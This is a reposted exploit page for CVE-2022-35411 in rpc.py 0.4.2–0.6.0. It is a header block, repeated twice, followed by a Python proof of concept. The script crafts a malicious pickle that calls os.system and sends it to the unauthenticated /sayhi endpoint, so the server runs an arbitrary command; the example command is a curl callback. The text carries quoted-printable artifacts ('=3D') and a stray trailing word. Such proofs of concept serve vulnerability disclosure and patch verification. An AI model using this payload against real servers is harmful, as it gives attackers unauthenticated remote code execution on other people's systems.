rpc.py 0.6.0 Remote Code Execution – Torchsec
# Exploit Title: rpc.py 0.6.0 - Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 2022-07-12
# Exploit Author: Elias Hohl
# Vendor Homepage: https://github.com/abersheeran
# Software Link: https://github.com/abersheeran/rpc.py
# Version: v0.4.2 - v0.6.0
# Tested on: Debian 11, Ubuntu 20.04
# CVE : CVE-2022-35411
# Google Dork: N/A
# Date: 2022-07-12
# Exploit Author: Elias Hohl
# Vendor Homepage: https://github.com/abersheeran
# Software Link: https://github.com/abersheeran/rpc.py
# Version: v0.4.2 - v0.6.0
# Tested on: Debian 11, Ubuntu 20.04
# CVE : CVE-2022-35411
import requests
import pickle
# Unauthenticated RCE 0-day for https://github.com/abersheeran/rpc.py
HOST =3D "127.0.0.1:65432"
URL =3D f"http://{HOST}/sayhi"
HEADERS =3D {
"serializer": "pickle"
}
def generate_payload(cmd):
class PickleRce(object):
def __reduce__(self):
import os
return os.system, (cmd,)
payload =3D pickle.dumps(PickleRce())
print(payload)
return payload
def exec_command(cmd):
payload =3D generate_payload(cmd)
requests.post(url=3DURL, data=3Dpayload, headers=3DHEADERS)
def main():
exec_command('curl http://127.0.0.1:4321')
# exec_command('uname -a')
if __name__ =3D=3D "__main__":
main()
Gloss